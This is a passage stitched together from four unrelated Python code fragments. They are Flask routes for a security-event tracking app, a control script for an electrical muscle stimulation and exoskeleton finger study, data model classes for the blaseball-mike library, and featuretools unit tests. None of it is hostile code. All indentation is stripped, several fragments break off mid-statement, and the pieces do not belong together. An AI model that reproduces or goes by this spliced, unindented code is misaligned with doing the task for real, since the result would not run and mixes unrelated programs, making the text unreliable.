query = query.order_by(Event.campaign.desc())
else:
query = query.order_by(Event.campaign.asc())
elif session['event_sort_by'] == 'prevention':
if session['event_sort_dir']:
query = query.order_by(Event.prevention_tool.desc())
else:
query = query.order_by(Event.prevention_tool.asc())
elif session['event_sort_by'] == 'remediation':
if session['event_sort_dir']:
query = query.order_by(Event.remediation.desc())
else:
query = query.order_by(Event.remediation.asc())
elif session['event_sort_by'] == 'status':
if session['event_sort_dir']:
query = query.order_by(Event.status.desc())
else:
query = query.order_by(Event.status.asc())
elif session['event_sort_by'] == 'risk_level':
if session['event_sort_dir']:
query = query.order_by(Event.risk_level.desc())
else:
query = query.order_by(Event.risk_level.asc())
events = query.all()
if session['event_sort_by'] == 'disposition':
events = sorted(events, key=lambda event: event.disposition_rank, reverse=session['event_sort_dir'])
event_tags = {}
# we don't show "special" or "hidden" tags in the display
special_tag_names = [tag for tag in saq.CONFIG['tags'].keys() if saq.CONFIG['tags'][tag] in ['special', 'hidden' ]]
for event in events:
event_tags[event.id] = []
for tag in event.sorted_tags:
if tag.name not in special_tag_names:
event_tags[event.id].append(tag)
return render_template('analysis/events.html', events=events, event_tags=event_tags, filter_state=filter_state, malware=malware, companies=companies, campaigns=campaigns, sort_by=session['event_sort_by'], sort_dir=session['event_sort_dir'])
@analysis.route('/event_alerts', methods=['GET'])
@login_required
def event_alerts():
event_id = request.args['event_id']
events = db.session.query(Event).filter(Event.id == event_id).all()
event = events[0]
event_mappings = db.session.query(EventMapping).filter(EventMapping.event_id == event_id).all()
alert_tags = {}
special_tag_names = [tag for tag in saq.CONFIG['tags'].keys() if saq.CONFIG['tags'][tag] in ['special', 'hidden' ]]
for event_mapping in event_mappings:
alert_tags[event_mapping.alert.uuid] = []
for tag in event_mapping.alert.sorted_tags:
if tag.name not in special_tag_names:
alert_tags[event_mapping.alert.uuid].append(tag)
return render_template('analysis/event_alerts.html', alert_tags=alert_tags, event_mappings=event_mappings, event=event)
@analysis.route('/remove_alerts', methods=['POST'])
@login_required
def remove_alerts():
# get list of event mappings to delete
mappings = request.form['event_mappings'].split(',')
# connect to db
with get_db_connection() as db:
c = db.cursor()
# delete all mappings
for mapping in mappings:
event_id, alert_id = mapping.split("_")
c.execute("""DELETE FROM event_mapping WHERE event_id=%s AND alert_id=%s""", (event_id, alert_id))
# commit changes to databse
db.commit()
# return to events page
return redirect(url_for('analysis.events'))
@analysis.route('/edit_event_modal', methods=['GET'])
@login_required
def edit_event_modal():
event_id = request.args['event_id']
events = db.session.query(Event).filter(Event.id == event_id).all()
event = events[0]
malware = db.session.query(Malware).order_by(Malware.name.asc()).all()
campaigns = db.session.query(Campaign).order_by(Campaign.name.asc()).all()
return render_template('analysis/event_edit.html', event=event, malware=malware, campaigns=campaigns)
@analysis.route('/edit_event', methods=['POST'])
@login_required
def edit_event():
event_id = request.form.get('event_id', None)
event_type = request.form.get('event_type', None)
event_vector = request.form.get('event_vector', None)
event_risk_level = request.form.get('event_risk_level', None)
event_prevention = request.form.get('event_prevention', None)
event_comment = request.form.get('event_comment', None)
event_status = request.form.get('event_status', None)
event_remediation = request.form.get('event_remediation', None)
event_disposition = request.form.get('event_disposition', None)
threats = request.form.getlist('threats', None)
campaign_id = request.form.get('campaign_id', None)
new_campaign = request.form.get('new_campaign', None)
with get_db_connection() as db:
c = db.cursor()
if (campaign_id == "NEW"):
c.execute("""SELECT id FROM campaign WHERE name = %s""", (new_campaign))
if c.rowcount > 0:
result = c.fetchone()
| |
freq=1, min=PID_EXO_minOut, max=PID_EXO_maxOut)
PID_EXO.target = target_arr[target_index]
# unpacking PID profile for clarity
PID_EXO_frequency = PID_EXO_FLEX_profiles[target_index][5]
brake_offset = PID_EXO_FLEX_profiles[target_index][6]
error_margin_EXO = PID_EXO_FLEX_profiles[target_index][7]
brake_target = target_arr[target_index - brake_offset] - error_margin_EXO
print(PID_EXO.target)
print(brake_target)
time.sleep(1)
input("Curl fingers.")
exo_lock()
input("When at 0, press any key to zero angle.")
# input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
exo_unlock()
input("Ready?")
time.sleep(random.uniform(1, 4))
post_lock_timer = 5000
post_lock_ems = 0
pulse_width_tmp = 0
# Reset timer for first run
time_initial = time.time()
time_lastEMS = 0
# Continues to record after target reached for "post_lock_timer" increments
while post_lock_timer != 0:
# read filtered delta angle
angle = moving_avg(read_angle())
output = PID_EXO.step(angle)
time_now = time.time() - time_initial # in seconds
# angular_velocity = get_angular_velocity(angle, time_now)
# print(angular_velocity)
if angle < brake_target and brake_state == 0: # or angle > target + error_margin:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
# print(time_now - time_lastEMS)
time_lastEMS = time_now
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 1,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
ems.send_signal()
# else:
# print("Sending EMS...")
else: # Target reached
if post_lock_ems != 0:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
time_lastEMS = time_now
post_lock_ems = post_lock_ems - 1
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 1,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
# ems.send_signal()
# else:
# print("Sending EMS...")
if brake_state == 0: # lock joint once
exo_lock()
# Start timer
post_lock_timer = post_lock_timer - 1
# Log data to csv
file = open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a')
time_log = time.time() - time_initial
file.write(str(time_log) + "," + str(angle) + "," + str(target_arr[target_index]) + "," + str(output) + "," + str(pulse_width_tmp) + "," + str(brake_state * brake_target) + "\n")
print("angle: " + str("{0:.2f}".format(angle)) + " PID output: " + str("{0:.2f}".format(output)) + " pulse width: " + str(pulse_width_tmp) + " brake_state: " + str(brake_state) + " timer: " + str(post_lock_timer))
if (show_plot):
# # need pause or else plot crashes
plt.pause(0.01)
plt.draw()
# Stop study
study_mode = 0
print("DONE!")
# exo condition
elif study_mode == 3:
# Unlock joint ring mcp
exo_unlock()
# EMS config - flexor
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = 300,
intensity = ems_intensity_flex,
)
# Setting logging
file = open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a')
file.write("time" + "," + "angle" + "," + "target" + "," + "output" + "," + "pulse_width" + "," + "brake_state" + "\n")
# init PID controller
PID_EXO = PIDController(P=PID_EXO_EXT_profiles[target_index][0], I=PID_EXO_EXT_profiles[target_index][1], D=PID_EXO_EXT_profiles[target_index][2],
freq=1, min=PID_EXO_EXT_profiles[target_index][3], max=PID_EXO_EXT_profiles[target_index][4])
#PID_EXO = PIDController(P=PID_EXO_P, I=PID_EXO_I, D=PID_EXO_D, freq=1, min=PID_EXO_minOut, max=PID_EXO_maxOut)
PID_EXO.target = target_arr[target_index]
# unpacking PID profile for clarity
PID_EXO_frequency = PID_EXO_EXT_profiles[target_index][5]
brake_offset = PID_EXO_EXT_profiles[target_index][6]
error_margin_EXO = PID_EXO_EXT_profiles[target_index][7]
brake_target = target_arr[target_index-brake_offset] - error_margin_EXO
print(PID_EXO.target)
print(brake_target)
time.sleep(1)
input("Curl fingers.")
exo_lock()
input("When at 0, press any key to zero angle.")
# input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
exo_unlock()
input("Ready?")
time.sleep(random.uniform(1, 4))
post_lock_timer = 5000
post_lock_ems = 0
pulse_width_tmp = 0
# Reset timer for first run
time_initial = time.time()
time_lastEMS = 0
# Continues to record after target reached for "post_lock_timer" increments
while post_lock_timer != 0:
# read filtered delta angle
angle = moving_avg(read_angle())
output = PID_EXO.step(angle)
time_now = time.time() - time_initial # in seconds
# angular_velocity = get_angular_velocity(angle, time_now)
# print(angular_velocity)
if angle > brake_target and brake_state == 0: # or angle > target + error_margin:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
# print(time_now - time_lastEMS)
time_lastEMS = time_now
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
ems.send_signal()
# else:
# print("Sending EMS...")
else: # Target reached
if post_lock_ems != 0:
# update every PID_frequency Hz
if (time_now - time_lastEMS > 1 / PID_EXO_frequency):
time_lastEMS = time_now
post_lock_ems = post_lock_ems - 1
# Send EMS
pulse_width_tmp = int(abs(output))
if ems_connected:
ems.set_param(
pulse_count = 1,
channel = 2,
pulse_width = pulse_width_tmp,
intensity = ems_intensity_flex,
)
# ems.send_signal()
# else:
# print("Sending EMS...")
if brake_state == 0: # lock joint once
exo_lock()
# Start timer
post_lock_timer = post_lock_timer - 1
# Log data to csv
file = open(log_path + "/" + str(target_arr[target_index]) + "/" + log_filename_EXO, 'a')
time_log = time.time() - time_initial
file.write(str(time_log) + "," + str(angle) + "," + str(target_arr[target_index]) + "," + str(output) + "," + str(pulse_width_tmp) + "," + str(brake_state * brake_target) + "\n")
print("angle: " + str("{0:.2f}".format(angle)) + " PID output: " + str("{0:.2f}".format(output)) + " pulse width: " + str(pulse_width_tmp) + " brake_state: " + str(brake_state) + " timer: " + str(post_lock_timer))
if (show_plot):
# # need pause or else plot crashes
plt.pause(0.01)
plt.draw()
# Stop study
study_mode = 0
print("DONE!")
# read sensor continously
elif study_mode == 4:
time_output = 0
input("Lay user's hand flat to zero the angle...press any key to continue")
# zero the angles from the 2 rigid bodies
setOffset()
while True:
time_now = time.time() # in seconds
# update every PID_frequency Hz
if (time_now - time_output > 1 / 30):
angle = moving_avg(read_angle())
print("angle: " + str("{0:.2f}".format(angle))
+ " finger: " + str("{0:.2f}".format(finger_bank))
+ " hand: " + str("{0:.2f}".format(hand_bank)))
if (debug_opti):
# print(str("{0:.2f}".format(hand_attitude)) + " " + str("{0:.2f}".format(hand_heading)) + " "
# + str("{0:.2f}".format(hand_bank))
# + " -- "
# + str("{0:.2f}".format(finger_attitude)) + " " + str("{0:.2f}".format(finger_heading)) + " "
# + str("{0:.2f}".format(finger_bank)) )
# attitude = finger_attitude - hand_attitude
# heading = finger_heading - hand_heading
# bank = finger_bank - hand_bank
# out = math.sqrt( math.pow(attitude,2) + math.pow(heading,2) + math.pow(bank,2))
# print(out)
print(str("{0:.2f}".format(t_attitude)) + " " + str("{0:.2f}".format(t_heading)) + " "
+ str("{0:.2f}".format(t_bank)))
time_output = time.time()
# ard_angle.close()
study_mode = 0
else:
print("Wrong input, please select again... Input is " + study_mode)
study_mode = 0
# Animate plot
def animate(i, xs, ys):
# generate random values to show
#sensor_value = np.random.random()
global angle
sensor_value = angle
# Add x and y to lists
xs.append(datetime.now().strftime('%M:%S.%f'))
ys.append(sensor_value)
# Limit x and y lists to 20 items
xs = xs[-20:]
ys = ys[-20:]
# Draw x and y lists
ax.clear()
ax.plot(xs, ys)
# Format plot
plt.xticks(rotation=45, ha='right')
plt.subplots_adjust(bottom=0.30)
plt.title('sensor value')
plt.ylabel('unit')
# Angle functions
def read_angle():
global prev_angle
# if no physical inputs, use random values
if opti_connected == True:
hand_bank_zeroed = hand_bank - hand_bank_off
finger_bank_zeroed = finger_bank - finger_bank_off
angle = - finger_bank_zeroed + hand_bank_zeroed
else:
# angle = np.random.random() * 10 + target - 9 #always hovering above target
if prev_angle < target - 5:
# climbing from 0 to target
angle = prev_angle + np.random.random() * 0.2
else:
# stabilizing around target
angle = np.random.random() * 2 - 1 + target
prev_angle = angle
return angle
def setOffset():
global finger_bank_off, hand_bank_off
if (opti_connected):
finger_bank_off = finger_bank
hand_bank_off = hand_bank
def get_angular_velocity(current_angle, current_angle_time):
global prev_angle
global prev_angle_time
try:
angular_velocity = (current_angle - prev_angle) / (current_angle_time - prev_angle_time)
except:
angular_velocity = 0
# print(str(current_angle) + " --- " + str(current_angle - prev_angle) + " " + str(current_angle_time - prev_angle_time) + " = " + str(angular_velocity))
# prev_angle = current_angle
prev_angle_time = current_angle_time
return angular_velocity
def moving_avg(input): # moving average filter
global angle_array
global moving_avg_counter
angle_array.pop(0) # remove first element
angle_array.append(input) # add input to last element
# ignore first values to initialize array
if moving_avg_counter != 0:
moving_avg_counter -= 1
if debug_filter:
print ("Modified list is : " + str(angle_array) + " output " + str(input))
return input
else:
output = 0
for x in angle_array:
output | |
<reponame>everlastingwonder/blaseball-mike
"""For deserializing the json responses"""
import abc
import math
import random
from collections import OrderedDict
import re
from dateutil.parser import parse
from blaseball_mike import database, reference, tables
class Base(abc.ABC):
_camel_to_snake_re = re.compile(r'(?<!^)(?=[A-Z])')
def __init__(self, data):
self.fields = []
for key, value in data.items():
self.fields.append(key)
setattr(self, Base._camel_to_snake(key), value)
@staticmethod
def _camel_to_snake(name):
return Base._camel_to_snake_re.sub('_', name).lower()
def json(self):
return {
f: getattr(self, self._camel_to_snake(f)) for f in self.fields
}
class GlobalEvent(Base):
@classmethod
def load(cls):
events = database.get_global_events()
return [cls(event) for event in events]
class SimulationData(Base):
@classmethod
def load(cls):
return cls(database.get_simulation_data())
@property
def league(self):
if self._league:
return self._league
self._league = League.load_by_id(self._league_id)
return self._league
@league.setter
def league(self, value):
self._league = None
self._league_id = value
@property
def next_election_end(self):
return self._next_election_end
@next_election_end.setter
def next_election_end(self, value):
self._next_election_end = parse(value)
@property
def next_phase_time(self):
return self._next_phase_time
@next_phase_time.setter
def next_phase_time(self, value):
self._next_phase_time = parse(value)
@property
def next_season_start(self):
return self._next_season_start
@next_season_start.setter
def next_season_start(self, value):
self._next_season_start = parse(value)
class Player(Base):
@classmethod
def load(cls, *ids):
"""
Load dictionary of players
"""
players = database.get_player(list(ids))
return {
id_: cls(player) for (id_, player) in players.items()
}
@classmethod
def load_one(cls, id_):
"""
Load single player.
"""
return cls.load(id_).get(id_)
@classmethod
def find_by_name(cls, name):
"""
Try to find the player by their name (case sensitive) or return None.
"""
ids = reference.get_player_ids_by_name(name)
if not ids:
return None
return cls.load_one(ids[0])
@property
def hitting_rating(self):
if getattr(self, "_hitting_rating", None):
return self._hitting_rating
return (((1 - self.tragicness) ** 0.01) * ((1 - self.patheticism) ** 0.05) *
((self.thwackability * self.divinity) ** 0.35) *
((self.moxie * self.musclitude) ** 0.075) * (self.martyrdom ** 0.02))
@hitting_rating.setter
def hitting_rating(self, value):
self._hitting_rating = value
@property
def batting_rating(self):
return self.hitting_rating
@property
def pitching_rating(self):
if getattr(self, "_pitching_rating", None):
return self._pitching_rating
return ((self.unthwackability ** 0.5) * (self.ruthlessness ** 0.4) *
(self.overpowerment ** 0.15) * (self.shakespearianism ** 0.1) * (self.coldness ** 0.025))
@pitching_rating.setter
def pitching_rating(self, value):
self._pitching_rating = value
@property
def baserunning_rating(self):
if getattr(self, "_baserunning_rating", None):
return self._baserunning_rating
return ((self.laserlikeness**0.5) *
((self.continuation * self.base_thirst * self.indulgence * self.ground_friction) ** 0.1))
@baserunning_rating.setter
def baserunning_rating(self, value):
self._baserunning_rating = value
@property
def defense_rating(self):
if getattr(self, "_defense_rating", None):
return self._defense_rating
return (((self.omniscience * self.tenaciousness) ** 0.2) *
((self.watchfulness * self.anticapitalism * self.chasiness) ** 0.1))
@defense_rating.setter
def defense_rating(self, value):
self._defense_rating = value
@staticmethod
def _rating_to_stars(val):
return 0.5 * (round(val * 10))
@property
def hitting_stars(self):
return self._rating_to_stars(self.hitting_rating)
@property
def batting_stars(self):
return self.hitting_stars
@property
def pitching_stars(self):
return self._rating_to_stars(self.pitching_rating)
@property
def baserunning_stars(self):
return self._rating_to_stars(self.baserunning_rating)
@property
def defense_stars(self):
return self._rating_to_stars(self.defense_rating)
def get_vibe(self, day):
"""
Day is 1-indexed
"""
return 0.5 * ((self.pressurization + self.cinnamon) *
math.sin(math.pi * (2 / (6 + round(10 * self.buoyancy)) * (day - 1) + 0.5)) -
self.pressurization + self.cinnamon)
@property
def soulscream(self):
letters = ["A", "E", "I", "O", "U", "X", "H", "A", "E", "I"]
stats = [self.pressurization, self.divinity, self.tragicness, self.shakespearianism, self.ruthlessness]
scream = []
for r in range(self.soul):
sub_scream = []
i = 10 ** -r
for s in stats:
try:
c = math.floor((s % i) / i * 10)
sub_scream.append(letters[c])
except ZeroDivisionError:
sub_scream.append("undefined")
scream.extend(sub_scream + sub_scream + [sub_scream[0]])
return ''.join(scream)
@property
def blood(self):
return tables.Blood(self._blood)
@blood.setter
def blood(self, value):
self._blood = value
@property
def coffee(self):
return tables.Coffee(self._coffee)
@coffee.setter
def coffee(self, value):
self._coffee = value
@property
def bat(self):
return tables.Item(self._bat)
@bat.setter
def bat(self, value):
self._bat = value
@property
def armor(self):
return tables.Item(self._armor)
@armor.setter
def armor(self, value):
self._armor = value
@property
def perm_attr(self):
return [tables.Modification(attr) for attr in self._perm_attr]
@perm_attr.setter
def perm_attr(self, value):
self._perm_attr = value
@property
def seas_attr(self):
return [tables.Modification(attr) for attr in self._seas_attr]
@seas_attr.setter
def seas_attr(self, value):
self._seas_attr = value
@property
def week_attr(self):
return [tables.Modification(attr) for attr in self._week_attr]
@week_attr.setter
def week_attr(self, value):
self._week_attr = value
@property
def game_attr(self):
return [tables.Modification(attr) for attr in self._game_attr]
@game_attr.setter
def game_attr(self, value):
self._game_attr = value
def simulated_copy(self, overrides=None, multipliers=None, buffs=None, reroll=None):
"""
Return a copy of this player with adjusted stats (ie to simulate blessings)
`overrides` is a dict where the key specifies an attribute to completely overwrite with new value.
`multipliers` is a dict where key specifies attr to multiply by value
`buffs` is a dict where key specifies attr to add value
`reroll` is a dict where the key specifies attr to reroll (value is unused)
`batting_rating`, `pitching_rating`, `baserunning_rating`, `defense_rating`, and `overall_rating`
can additionally be passed to `multipliers` and `buffs` to automatically multiply the appropriate
related stats.
"""
overrides = overrides or {}
multipliers = multipliers or {}
buffs = buffs or {}
reroll = reroll or {}
original_json = self.json()
for override_key, override_value in overrides.items():
original_json[override_key] = override_value
for m_key, m_val in multipliers.items():
if m_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] *= (1.0 - m_val)
original_json['patheticism'] *= (1.0 - m_val)
original_json['thwackability'] *= (1.0 + m_val)
original_json['divinity'] *= (1.0 + m_val)
original_json['moxie'] *= (1.0 + m_val)
original_json['musclitude'] *= (1.0 + m_val)
original_json['martyrdom'] *= (1.0 + m_val)
if m_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] *= (1.0 + m_val)
original_json['ruthlessness'] *= (1.0 + m_val)
original_json['overpowerment'] *= (1.0 + m_val)
original_json['shakespearianism'] *= (1.0 + m_val)
original_json['coldness'] *= (1.0 + m_val)
if m_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] *= (1.0 + m_val)
original_json['continuation'] *= (1.0 + m_val)
original_json['baseThirst'] *= (1.0 + m_val)
original_json['indulgence'] *= (1.0 + m_val)
original_json['groundFriction'] *= (1.0 + m_val)
if m_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] *= (1.0 + m_val)
original_json['tenaciousness'] *= (1.0 + m_val)
original_json['watchfulness'] *= (1.0 + m_val)
original_json['anticapitalism'] *= (1.0 + m_val)
original_json['chasiness'] *= (1.0 + m_val)
if m_key in ('tragicness', 'patheticism'):
original_json[m_key] *= (1.0 - m_val)
elif m_key in original_json:
original_json[m_key] *= (1.0 + m_val)
for b_key, b_val in buffs.items():
if b_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] = min(0.99, max(0.01, original_json['tragicness'] - b_val))
original_json['patheticism'] = min(0.99, original_json['patheticism'] - b_val)
original_json['thwackability'] = max(0.01, original_json['thwackability'] + b_val)
original_json['divinity'] = max(0.01, original_json['divinity'] + b_val)
original_json['moxie'] = max(0.01, original_json['moxie'] + b_val)
original_json['musclitude'] = max(0.01, original_json['musclitude'] + b_val)
original_json['martyrdom'] = max(0.01, original_json['martyrdom'] + b_val)
if b_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] = max(0.01, original_json['unthwackability'] + b_val)
original_json['ruthlessness'] = max(0.01, original_json['ruthlessness'] + b_val)
original_json['overpowerment'] = max(0.01, original_json['overpowerment'] + b_val)
original_json['shakespearianism'] = max(0.01, original_json['shakespearianism'] + b_val)
original_json['coldness'] = max(0.01, original_json['coldness'] + b_val)
if b_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] = max(0.01, original_json['laserlikeness'] + b_val)
original_json['continuation'] = max(0.01, original_json['continuation'] + b_val)
original_json['baseThirst'] = max(0.01, original_json['baseThirst'] + b_val)
original_json['indulgence'] = max(0.01, original_json['indulgence'] + b_val)
original_json['groundFriction'] = max(0.01, original_json['groundFriction'] + b_val)
if b_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] = max(0.01, original_json['omniscience'] + b_val)
original_json['tenaciousness'] = max(0.01, original_json['tenaciousness'] + b_val)
original_json['watchfulness'] = max(0.01, original_json['watchfulness'] + b_val)
original_json['anticapitalism'] = max(0.01, original_json['anticapitalism'] + b_val)
original_json['chasiness'] = max(0.01, original_json['chasiness'] + b_val)
if b_key in ('tragicness', 'patheticism'):
original_json[b_key] = min(0.99, max(0.01, original_json[b_key] - b_val))
elif b_key in original_json:
original_json[b_key] = max(0.01, original_json[b_key] + b_val)
for r_key, _ in reroll.items():
if r_key in ('batting_rating', 'overall_rating'):
original_json['tragicness'] = random.uniform(0.01, 0.99)
original_json['patheticism'] = random.uniform(0.01, 0.99)
original_json['thwackability'] = random.uniform(0.01, 0.99)
original_json['divinity'] = random.uniform(0.01, 0.99)
original_json['moxie'] = random.uniform(0.01, 0.99)
original_json['musclitude'] = random.uniform(0.01, 0.99)
original_json['martyrdom'] = random.uniform(0.01, 0.99)
if r_key in ('pitching_rating', 'overall_rating'):
original_json['unthwackability'] = random.uniform(0.01, 0.99)
original_json['ruthlessness'] = random.uniform(0.01, 0.99)
original_json['overpowerment'] = random.uniform(0.01, 0.99)
original_json['shakespearianism'] = random.uniform(0.01, 0.99)
original_json['coldness'] = random.uniform(0.01, 0.99)
if r_key in ('baserunning_rating', 'overall_rating'):
original_json['laserlikeness'] = random.uniform(0.01, 0.99)
original_json['continuation'] = random.uniform(0.01, 0.99)
original_json['baseThirst'] = random.uniform(0.01, 0.99)
original_json['indulgence'] = random.uniform(0.01, 0.99)
original_json['groundFriction'] = random.uniform(0.01, 0.99)
if r_key in ('defense_rating', 'overall_rating'):
original_json['omniscience'] = random.uniform(0.01, 0.99)
original_json['tenaciousness'] = random.uniform(0.01, 0.99)
original_json['watchfulness'] = random.uniform(0.01, 0.99)
original_json['anticapitalism'] = random.uniform(0.01, 0.99)
original_json['chasiness'] = random.uniform(0.01, 0.99)
if r_key in ('tragicness', 'patheticism'):
original_json[r_key] = random.uniform(0.01, 0.99)
elif r_key in original_json:
original_json[r_key] = random.uniform(0.01, 0.99)
return Player(original_json)
class Team(Base):
@classmethod
def load(cls, id_):
return cls(database.get_team(id_))
@classmethod
def load_all(cls):
"""
Returns dictionary keyed by team ID
"""
return {
id_: cls(team) for id_, team in database.get_all_teams().items()
}
@classmethod
def load_by_name(cls, name):
"""
Name can be full name or nickname, case insensitive.
"""
teams = cls.load_all().values()
name = name.lower()
for team in teams:
if name in team.full_name.lower():
return team
return None
@property
def lineup(self):
if self._lineup:
return self._lineup
players = Player.load(*self._lineup_ids)
self._lineup = [players.get(id_) for id_ in self._lineup_ids]
return self._lineup
@lineup.setter
def lineup(self, value):
self._lineup = None
self._lineup_ids = value
@property
def rotation(self):
if self._rotation:
return self._rotation
players = Player.load(*self._rotation_ids)
self._rotation = [players.get(id_) for id_ | |
2, 3])
df = to_pandas(df, index='id', sort_index=True)
for i, test in enumerate(to_test[:-1]):
v = df[features[i].get_name()].tolist()
assert v == test[1]
i, test = -1, to_test[-1]
v = df[features[i].get_name()].tolist()
assert (np.isnan(v[0]))
assert v[1:] == test[1][1:]
def test_arithmetic_of_direct(es):
rating = ft.Feature(es['products'].ww['rating'])
log_rating = ft.Feature(rating, 'log')
customer_age = ft.Feature(es['customers'].ww['age'])
session_age = ft.Feature(customer_age, 'sessions')
log_age = ft.Feature(session_age, 'log')
to_test = [(AddNumeric, [38, 37, 37.5, 37.5]),
(SubtractNumeric, [28, 29, 28.5, 28.5]),
(MultiplyNumeric, [165, 132, 148.5, 148.5]),
(DivideNumeric, [6.6, 8.25, 22. / 3, 22. / 3])]
if es.dataframe_type == Library.KOALAS.value:
to_test = to_test[:1] + to_test[2:]
features = []
for test in to_test:
features.append(ft.Feature([log_age, log_rating], primitive=test[0]))
df = ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=[0, 3, 5, 7])
df = to_pandas(df, index='id', sort_index=True)
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert v == test[1]
# Koalas EntitySets do not support boolean multiplication
@pytest.fixture(params=['pd_boolean_mult_es', 'dask_boolean_mult_es'])
def boolean_mult_es(request):
return request.getfixturevalue(request.param)
@pytest.fixture
def pd_boolean_mult_es():
es = ft.EntitySet()
df = pd.DataFrame({"index": [0, 1, 2],
"bool": pd.Series([True, False, True]),
"numeric": [2, 3, np.nan]})
es.add_dataframe(dataframe_name="test",
dataframe=df,
index="index")
return es
@pytest.fixture
def dask_boolean_mult_es(pd_boolean_mult_es):
dataframes = {}
for df in pd_boolean_mult_es.dataframes:
dataframes[df.ww.name] = (dd.from_pandas(df, npartitions=2), df.ww.index, None, df.ww.logical_types)
return ft.EntitySet(id=pd_boolean_mult_es.id, dataframes=dataframes)
def test_boolean_multiply(boolean_mult_es):
es = boolean_mult_es
to_test = [
('numeric', 'numeric'),
('numeric', 'bool'),
('bool', 'numeric'),
('bool', 'bool')
]
features = []
for row in to_test:
features.append(ft.Feature(es["test"].ww[row[0]]) * ft.Feature(es["test"].ww[row[1]]))
fm = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features))
df = to_pandas(es['test'])
for row in to_test:
col_name = '{} * {}'.format(row[0], row[1])
if row[0] == 'bool' and row[1] == 'bool':
assert fm[col_name].equals((df[row[0]] & df[row[1]]).astype('boolean'))
else:
assert fm[col_name].equals(df[row[0]] * df[row[1]])
# TODO: rework test to be Dask and Koalas compatible
def test_arithmetic_of_transform(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail("Test uses Diff which is not supported in Dask or Koalas")
diff1 = ft.Feature([ft.Feature(es['log'].ww['value'])], primitive=Diff)
diff2 = ft.Feature([ft.Feature(es['log'].ww['value_2'])], primitive=Diff)
to_test = [(AddNumeric, [np.nan, 7., -7., 10.]),
(SubtractNumeric, [np.nan, 3., -3., 4.]),
(MultiplyNumeric, [np.nan, 10., 10., 21.]),
(DivideNumeric, [np.nan, 2.5, 2.5, 2.3333333333333335])]
features = []
for test in to_test:
features.append(ft.Feature([diff1, diff2], primitive=test[0]()))
feature_set = FeatureSet(features)
calculator = FeatureSetCalculator(es, feature_set=feature_set)
df = calculator.run(np.array([0, 2, 12, 13]))
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert np.isnan(v.pop(0))
assert np.isnan(test[1].pop(0))
assert v == test[1]
def test_not_feature(es):
not_feat = ft.Feature(es['customers'].ww['loves_ice_cream'], primitive=Not)
features = [not_feat]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=[0, 1]))
v = df[not_feat.get_name()].values
assert not v[0]
assert v[1]
def test_arithmetic_of_agg(es):
customer_id_feat = ft.Feature(es['customers'].ww['id'])
store_id_feat = ft.Feature(es['stores'].ww['id'])
count_customer = ft.Feature(customer_id_feat, parent_dataframe_name=u'régions', primitive=Count)
count_stores = ft.Feature(store_id_feat, parent_dataframe_name=u'régions', primitive=Count)
to_test = [(AddNumeric, [6, 2]),
(SubtractNumeric, [0, -2]),
(MultiplyNumeric, [9, 0]),
(DivideNumeric, [1, 0])]
# Skip SubtractNumeric for Koalas as it's unsupported
if es.dataframe_type == Library.KOALAS.value:
to_test = to_test[:1] + to_test[2:]
features = []
for test in to_test:
features.append(ft.Feature([count_customer, count_stores], primitive=test[0]()))
ids = ['United States', 'Mexico']
df = ft.calculate_feature_matrix(entityset=es, features=features,
instance_ids=ids)
df = to_pandas(df, index='id', sort_index=True)
df = df.loc[ids]
for i, test in enumerate(to_test):
v = df[features[i].get_name()].tolist()
assert v == test[1]
def test_latlong(pd_es):
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
latitude = ft.Feature(log_latlong_feat, primitive=Latitude)
longitude = ft.Feature(log_latlong_feat, primitive=Longitude)
features = [latitude, longitude]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features, instance_ids=range(15))
latvalues = df[latitude.get_name()].values
lonvalues = df[longitude.get_name()].values
assert len(latvalues) == 15
assert len(lonvalues) == 15
real_lats = [0, 5, 10, 15, 20, 0, 1, 2, 3, 0, 0, 5, 0, 7, 14]
real_lons = [0, 2, 4, 6, 8, 0, 1, 2, 3, 0, 0, 2, 0, 3, 6]
for i, v, in enumerate(real_lats):
assert v == latvalues[i]
for i, v, in enumerate(real_lons):
assert v == lonvalues[i]
def test_latlong_with_nan(pd_es):
df = pd_es['log']
df['latlong'][0] = np.nan
df['latlong'][1] = (10, np.nan)
df['latlong'][2] = (np.nan, 4)
df['latlong'][3] = (np.nan, np.nan)
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
latitude = ft.Feature(log_latlong_feat, primitive=Latitude)
longitude = ft.Feature(log_latlong_feat, primitive=Longitude)
features = [latitude, longitude]
fm = ft.calculate_feature_matrix(entityset=pd_es, features=features)
